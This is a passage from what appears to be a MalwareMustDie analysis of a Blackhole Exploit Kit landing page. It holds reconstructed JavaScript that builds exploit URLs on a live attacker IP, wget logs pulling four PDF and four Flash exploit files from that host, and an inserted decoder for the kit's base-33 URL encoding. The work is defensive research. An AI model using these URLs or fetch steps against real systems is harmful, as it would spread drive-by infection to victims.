  919. var domain="h00p://46.175.224.21:8080";
  920.  
  921. var url1 = domain + "/forum/links/public_version.php?jwio=" + x("244e0") + "&xnrj=" + x("nxjmw") + "&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg";
  922. var url2 = domain + "/forum/links/public_version.php?ecxrx=" + x("244e0") + "&pihpkcv=" + x("tlil") + "&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda";
  923. var url3 = domain + "/forum/links/public_version.php?jsehhtfz=" + x("c833f") + "&rrhjmwf=" + x("eomsp") + "&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms";
  924. var url4 = domain + "/forum/links/public_version.php?efoo=" + x("c833f") + "&bpsmrsqj=" + x("wdrh") + "&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx";
  925.  
  926. document.write(url1 + "\n" + url2+ "\n" + url3 + "\n" + url4);
  927.  
  928. // output
  929.  
  930. h00p://46.175.224.21:8080/forum/links/public_version.php?jwio=1h:1j:1j:32:1f&xnrj=3b:3l:37:3a:3k&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg
  931. h00p://46.175.224.21:8080/forum/links/public_version.php?ecxrx=1h:1j:1j:32:1f&pihpkcv=3h:39:36:39&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda
  932. h00p://46.175.224.21:8080/forum/links/public_version.php?jsehhtfz=30:1n:1i:1i:33&rrhjmwf=32:3c:3a:3g:3d&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms
  933. h00p://46.175.224.21:8080/forum/links/public_version.php?efoo=30:1n:1i:1i:33&bpsmrsqj=3k:31:3f:35&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx
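The two "crack logic" sections above show the encoder only. As an added example (not part of the original paste), the reverse direction: a decoder that turns the ":"-joined base-33 tokens in a captured BHEK URL back into the original strings, so an observed exploit URL can be read without re-running the landing page. It goes a little beyond the paste by decoding the fixed parameters as well; the sample URLs are the paste's own, and parameter names are the random ones BHEK used.

```javascript
// Added example, not from the original MalwareMustDie paste: decoder for
// the query-string encoding that the x() function in the paste produces.
// x() writes each character's charCode in base 33 and joins the tokens
// with ":" ; parseInt(token, 33) inverts Number.prototype.toString(33).

// Re-implementation of the paste's x() encoder (with proper declarations),
// used here only to round-trip check the decoder.
function encodeValue(s) {
  const d = [];
  for (let i = 0; i < s.length; i++) {
    d.push(s.charCodeAt(i).toString(33));
  }
  return d.join(":");
}

// Printable ASCII (0x21-0x7e) always encodes to exactly two base-33 digits,
// so a genuine encoded value is a ":"-joined list of two-digit tokens.
const ENCODED_RE = /^[0-9a-w]{2}(:[0-9a-w]{2})*$/;

function decodeValue(v) {
  if (!ENCODED_RE.test(v)) throw new Error("not a base-33 token list: " + v);
  return v.split(":").map(t => String.fromCharCode(parseInt(t, 33))).join("");
}

// Split a BHEK landing/exploit URL into its parameters and decode every
// value that matches the encoding. Other values (one-letter flags such as
// "p", or random padding such as "cbfyrfg") are reported with decoded === null.
function decodeBhekUrl(url) {
  const query = url.slice(url.indexOf("?") + 1);
  const params = {};
  for (const pair of query.split("&")) {
    const eq = pair.indexOf("=");
    const key = pair.slice(0, eq);
    const raw = pair.slice(eq + 1);
    params[key] = { raw, decoded: ENCODED_RE.test(raw) ? decodeValue(raw) : null };
  }
  return params;
}

// Sample input: the first PDF URL and the payload URL from the paste. They
// carry the same values under different randomly named parameters.
const SAMPLE_URLS = [
  "h00p://46.175.224.21:8080/forum/links/public_version.php?tzpiqxci=1h:1j:1j:32:1f&rqoddrzb=2w:3d:30&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=1k:1d:1f:1d:1g:1d:1f",
  "h00p://46.175.224.21:8080/forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i",
];

for (const u of SAMPLE_URLS) {
  console.log(u.slice(u.indexOf("?") + 1));
  for (const [k, v] of Object.entries(decodeBhekUrl(u))) {
    const shown = v.decoded === null ? "(not encoded)" : JSON.stringify(v.decoded);
    console.log("  " + k + " = " + v.raw + "  ->  " + shown);
  }
}
```

Running it shows that the PDF and payload URLs share the same decoded values (e.g. "244e0" and the dotted "5.0.1.0" that the paste's pdf variable holds), which is what makes the parameter values, rather than the random parameter names, the stable thing to key a detection on.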
  934.  
  935. //=============LET's FLUSH THEM (4 PDF + 4 SWF) ALL!!! =============
  936.  
  937. //pdf
  938.  
  939. --2013-02-18 15:50:22-- h00p://46.175.224.21:8080/forum/links/public_version.php?tzpiqxci=1h:1j:1j:32:1f&rqoddrzb=2w:3d:30&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=1k:1d:1f:1d:1g:1d:1f
  940. Connecting to 46.175.224.21:8080... connected.
  941. h00p request sent, awaiting response... 200 OK
  942. Length: 20161 (20K) [application/pdf]
  943. Saving to: `./pdf1.pdf'
  944. 100%[==============================================================================>] 20,161 32.3K/s in 0.6s
  945. 2013-02-18 15:50:24 (32.3 KB/s) - `./pdf1.pdf' saved [20161/20161]
  946.  
  947. --2013-02-18 15:50:53-- h00p://46.175.224.21:8080/forum/links/public_version.php?iitxovwc=1h:1j:1j:32:1f&hic=30&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=1k:1d:1f:1d:1g:1d:1f
  948. Connecting to 46.175.224.21:8080... connected.
  949. h00p request sent, awaiting response... 200 OK
  950. Length: 11194 (11K) [application/pdf]
  951. Saving to: `./pdf2.pdf'
  952. 100%[==============================================================================>] 11,194 32.5K/s in 0.3s
  953. 2013-02-18 15:50:54 (32.5 KB/s) - `./pdf2.pdf' saved [11194/11194]
  954.  
  955. --2013-02-18 15:51:22-- h00p://46.175.224.21:8080/forum/links/public_version.php?hysb=30:1n:1i:1i:33&togkor=3c:3m:3h&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=1k:1d:1f:1d:1g:1d:1f
  956. Connecting to 46.175.224.21:8080... connected.
  957. h00p request sent, awaiting response... 200 OK
  958. Length: 20161 (20K) [application/pdf]
  959. Saving to: `./pdf3.pdf'
  960. 100%[==============================================================================>] 20,161 31.6K/s in 0.6s
  961. 2013-02-18 15:51:24 (31.6 KB/s) - `./pdf3.pdf' saved [20161/20161]
  962.  
  963. --2013-02-18 15:52:02-- h00p://46.175.224.21:8080/forum/links/public_version.php?myedivup=30:1n:1i:1i:33&gtaaynbu=35&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=1k:1d:1f:1d:1g:1d:1f
  964. Connecting to 46.175.224.21:8080... connected.
  965. h00p request sent, awaiting response... 200 OK
  966. Length: 11160 (11K) [application/pdf]
  967. Saving to: `./pdf4.pdf'
  968. 100%[==============================================================================>] 11,160 34.6K/s in 0.3s
  969. 2013-02-18 15:52:03 (34.6 KB/s) - `./pdf4.pdf' saved [11160/11160]
  970.  
  971.  
  972. // flash....
  973.  
  974.  
  975. --2013-02-18 15:54:34-- h00p://46.175.224.21:8080/forum/links/public_version.php?jwio=1h:1j:1j:32:1f&xnrj=3b:3l:37:3a:3k&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg
  976. Connecting to 46.175.224.21:8080... connected.
  977. h00p request sent, awaiting response... 200 OK
  978. Length: 7981 (7.8K) [text/html]
  979. Saving to: `./flash1.swf'
  980. 100%[==============================================================================>] 7,981 26.7K/s in 0.3s
  981. 2013-02-18 15:54:36 (26.7 KB/s) - `./flash1.swf' saved [7981/7981]
  982.  
  983. --2013-02-18 15:54:58-- h00p://46.175.224.21:8080/forum/links/public_version.php?ecxrx=1h:1j:1j:32:1f&pihpkcv=3h:39:36:39&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda
  984. Connecting to 46.175.224.21:8080... connected.
  985. h00p request sent, awaiting response... 200 OK
  986. Length: 1030 (1.0K) [text/html]
  987. Saving to: `./flash2.swf'
  988. 100%[==============================================================================>] 1,030 --.-K/s in 0s
  989. 2013-02-18 15:54:59 (35.5 MB/s) - `./flash2.swf' saved [1030/1030]
  990.  
  991. --2013-02-18 15:55:14-- h00p://46.175.224.21:8080/forum/links/public_version.php?jsehhtfz=30:1n:1i:1i:33&rrhjmwf=32:3c:3a:3g:3d&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms
  992. Connecting to 46.175.224.21:8080... connected.
  993. h00p request sent, awaiting response... 200 OK
  994. Length: 7981 (7.8K) [text/html]
  995. Saving to: `./flash3.swf'
  996. 100%[==============================================================================>] 7,981 25.5K/s in 0.3s
  997. 2013-02-18 15:55:15 (25.5 KB/s) - `./flash3.swf' saved [7981/7981]
  998.  
  999.  
  1000. --2013-02-18 15:57:54-- h00p://46.175.224.21:8080/forum/links/public_version.php?efoo=30:1n:1i:1i:33&bpsmrsqj=3k:31:3f:35&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx
  1001. Connecting to 46.175.224.21:8080... connected.
  1002. h00p request sent, awaiting response... 200 OK
  1003. Length: 1030 (1.0K) [text/html]
  1004. Saving to: `./flash4.swf'
  1005. 100%[==============================================================================>] 1,030 --.-K/s in 0s
  1006. 2013-02-18 15:57:55 (36.2 MB/s) - `./flash4.swf' saved [1030/1030]
  1007.  
  1008.  
  1009. =========================
  1010.  
  1011. This BHEK has Geo-IP functions built in (which is why the payload served depends on the request IP)...
  1012. Reference: http://ondailybasis.com/blog/?p=1483
  1013.  
  1014. =========================
  1015.  
  1016. ----
  1017. #MalwareMustDie | @unixfreaxjp